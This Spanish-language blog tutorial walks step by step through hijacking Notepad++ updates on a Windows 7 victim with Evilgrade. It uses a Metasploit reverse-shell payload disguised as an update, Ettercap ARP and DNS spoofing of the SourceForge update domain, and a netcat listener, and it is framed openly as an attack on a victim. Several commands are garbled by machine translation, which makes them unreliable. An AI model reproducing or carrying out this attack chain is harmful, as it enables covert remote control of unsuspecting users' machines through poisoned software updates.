Secuestrando Actualizaciones con backtrack en windows7

Hacking avanzado: Secuestrar actualizaciones de software para instalar un rootkit para el Acceso total de una PC.

 

Hay innumerables maneras de hackear un sistema. No debemos pasar por alto ninguna de las posibilidades si queremos "poseer" el sistema. Como los sistemas se vuelven más y más seguro, tenemos que estar atentos en nuestra búsqueda de debilidades.  

En esta lección, vamos a  abusar de la confianza que un usuario tiene innata para las actualizaciones de software para instalar nuestro propio oyente / rootkit en su sistema.

Explotar "digno de confianza" Actualizaciones de Software 

Todos nosotros hemos visto que las actualizaciones de software mensaje- están disponibles ahora! Invariablemente, confiamos en este mensaje y descarguemos la actualización presumiblemente para hacer que nuestro sistema funcione mejor, añadir una nueva característica, o hacer nuestro sistema más seguro.
  ¿Y si, en cambio, cuando estamos pedirá que descargue esa actualización, estamos instalando software malicioso en nuestro sistema que le daría un control al hacker malicioso de nuestro sistema? 
 

 
 
Eso es lo que vamos a hacer a nuestra víctima aquí >:)
  A diferencia de muchos de nuestras lecciones sobre hacking, éste es independiente de casi cualquier otro factor como el sistema operativo, puertos, etc. Aquí vamos a estar abusando de la confianza, no un sistema operativo o aplicación.
  Este será uno de los métodos más complejos que hemos hecho en el Cyberattacking, así que si usted es nuevo en la piratería, es posible que desee volver después de hacer algo de trabajo de fondo. 

Paso 1: Instale Notepad ++

En esta lección, estaremos utilizando Notepad ++ como nuestro ejemplo de software que vamos a secuestrar su actualización, por lo que tendremos que instalarlo en un solo sistema. En mi ejemplo, he bajado a un sistema Windows 7.
 
 
 

Paso 2: Descargar e instalar EvilGrade

A continuación, vamos a instalar Infobytesec evilgrade, que fue diseñado para ser un marco modular que permite al atacante tomar ventaja de pobres implementaciones de actualización mediante la inyección de actualizaciones "malos" a un usuario desprevenido. Podemos descargar evilgrade de GitHub.
 
En esta leccion usaremos nuestro poderoso backtrack   
Ahora habra el  directorio llamado evilgrade.
  • mkdir -p / root / evilgrade
Ahora cambie a ese directorio.
  • cd / root / evilgrade
Siguiente: extraemos e instalamos evilgrade.
  • tar -xvf isr-evilgrade-2.0.0.tar.gz

 

 

Paso 3: Ejecutar Evilgrade

Lo siguiente que necesitamos para funcionar evilgrade. Nos escribimos:
  • ./evilgrade
 
 
 
Esto pone evilgrade en modo interactivo en el que ahora usamos de su propia línea de comandos:
  • evilgrade>

Paso 4: Módulos Lista

Ahora que evilgrade está en marcha, vamos a echar un vistazo a los módulos que evilgrade ha construido. Aquí, los módulos de software que representan evilgrade está diseñado para secuestrar sus actualizaciones / proceso de actualización.  
 
En esta leccion, por supuesto, vamos a ser el secuestro de la actualización de Notepad ++.
  Como se puede ver a continuación, evilgrade tiene módulos para muchas otras piezas de software, pero está lejos de cubrir todas las actualizaciones de software / actualizaciones.
  • módulos de demostración
 
 
 
La clave es encontrar qué aplicaciones la víctima está utilizando que están también en la lista de evilgrade de módulos y orientar esa aplicación.

Paso 5: Configurar el Bloc de notas

A continuación, tenemos que decirle evilgrade lo que el software que queremos secuestrar su proceso de actualización. Vamos a decirle evilgrade queremos secuestrar notepadplus.
  • evilgrade> Configurar notepadplus

Paso 6: A ver que parámetros el Notepad ++ módulo requiere

Nuestro siguiente paso es ver qué parámetros el evilgrade notepadplus módulo requiere para funcionar. Verificamos esto con un comando similar al Metasploit escribiendo:
  • mostrar opciones
 
 
 
Como podemos ver en la imagen anterior, este módulo requiere que señalamos a la fuente del Notepad ++ software y actualizaciones, a saber sourceforge.net.  
 
Además, tenemos que establecer el agente que será la carga maliciosa queremos instalar en la víctima en el lugar de la actualización esperada.

Paso 7: Generar un payload con Metsploit

Ahora que hemos evilgrade configuración y configurado, necesitamos desarrollar un payload malicioso a entregar al actualizar software en lugar de la actualización real.  
 
Podemos hacer esto con Metasploit. Si ha seguido mis otros tutoriales sobre Metasploit, sabes que podemos elegir un número de diferentes payloads utilizandos en Metasploit (Un payload es lo que carga en el sistema víctima darnos control). 
 
En este caso, vamos a utilizar una de las cargas más básicas, la cáscara tcp inversa.
  Podemos generar un payload sin necesidad de abrir Metasploit con el siguiente comando. Este comando toma un exploit en el marco de Metasploit y lo carga en un archivo llamado notepadplus_update.exe.
  • / pentest / exploits / marco / modules / cargas / ventanas shell_reverse_tcp LHOST 192.168.1.104> /root/evilgrade/notepadplus_update.exe
 
 
 
Tenga en cuenta, que si usted está utilizando una versión diferente de BackTrack o Kali, estos módulos de payload pueden estar en un directorio diferentes.

Paso 8: Start Evilgrade

A continuación, tenemos que iniciar el servidor evilgrade. Esto se hace con un simple comando de inicio.
  • evilgrade> inicio

Paso 9: Añadir Notepad ++ Update Server como el dominio de robar

Nuestro siguiente paso es añadir Notepad ++ con el dominio que queremos secuestrar. Podemos hacer esto añadiendo una entrada a Ettercap, etter.dns spoofing módulo.  
 
Esto nos permite suplantar el nombre de dominio de la fuente de actualización para el software víctima.
  Desde Notepad ++ está alojado en sourceforge, añadimos la siguiente línea al final del archivo etter.dns.
  • notepad-plus.sourceforge.net A 192.168.1.104
 
 
 
Por supuesto, la dirección IP que debe usar es la dirección IP que desea que el proceso de actualización para mirar a para su mal actualización.

Paso 10: Configurar Iptables

Iptables son Linux / Unix firewall / router. Podemos utilizar esta característica para dirigir el tráfico a través de nuestro sistema en un ataque MitM. Vamos a abrir el archivo etter.conf en tu editor de texto favorito.
 
¿Qué es un ataque MITM? (Man in the middle)
 
En el mundo de la seguridad informática, un ataque “man in the middle“ o si lo traducimos literalmente a “hombre en el medio”, es un tipo de amenaza que se aprovecha de un intermediario. El atacante en este caso, tiene la habilidad de desviar o controlar las comunicaciones entre dos partes. Por ejemplo, si se tratase de un ataque MITM a tu correo, el perpetrador podría desviar todos los e-mails a una dirección alterna para leer o alterar toda la información antes de enviarla al destinatario correcto.

Digamos que te conectas a una red WiFi en la calle para revisar tus redes sociales y tu email tranquilamente. Un hacker malintencionado puede interceptar las comunicaciones entre tu computadora o tu smartphone y la red WiFi, teniendo acceso a todo lo que haces. Si la red WiFi no está cifrada, y el atacante está cerca del rango de la conexión, se puede insertar a si mismo como “el hombre en el medio”. Siempre que el atacante pueda autenticarse como los dos lados de la comunicación, tendrá todo el acceso. 

Entendido el concepto, sigamos..
  • kwrite /etc/etter.conf
 
 
 
Como se ve cuando se desplaza hacia abajo alrededor de dos tercios del camino a través del archivo, hay una entrada que he resaltado en iptables. Simplemente descomentar (quitar el #) a la segunda y tercera líneas para permitir el uso de iptables.

Paso 11: Inicie Ettercap

Ahora podemos empezar ettercap con el siguiente comando.
  • ettercap -Tqi eth0 -P dns_spoof -M arp 192.168.1.114 192.168.1.104
Dónde:
  • --Camiseta Designa la interfaz Terminal
  • -q dice utilizar el modo silencioso
  • eth0 -i dice que queremos usar eth0 como nuestra interfaz
  • Dns_spoof -P designa que queremos utilizar el dns enchufe parodia IN_
  • Arp-M dice que queremos usar un ataque MitM con arp en entre los dos addresses_ IP

Paso 12: Inicie Netcat Listener

Ahora tenemos que empezar la escucha netcat de nuestra máquina de ataque. Tenemos que escuchar en el puerto definido por la aplicación evilgrade, en este caso, 1.234 para Notepad ++.
  • nc -l -p 1234

Paso 13: Abra Notepad ++

Ahora, vamos a abrir Notepad ++ de nuestro equipo de la víctima de Windows.

 

 

Paso 14: Verifique el DNS

Si la actualización no se dispara tan pronto como se abra Notepad ++, tenemos que comprobar la el DNS.
 
Evilgrade es una poderosa herramienta para el secuestro de las actualizaciones de software. Al jugar un ataque Man-in-the-Middle, podemos atacar casi cualquier sistema operativo con el software de actualización. La única limitación que tenemos aquí son los módulos que evilgrade está diseñado para secuestrar su actualización.
 
 

Suerte :) 

Exploit

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Instagram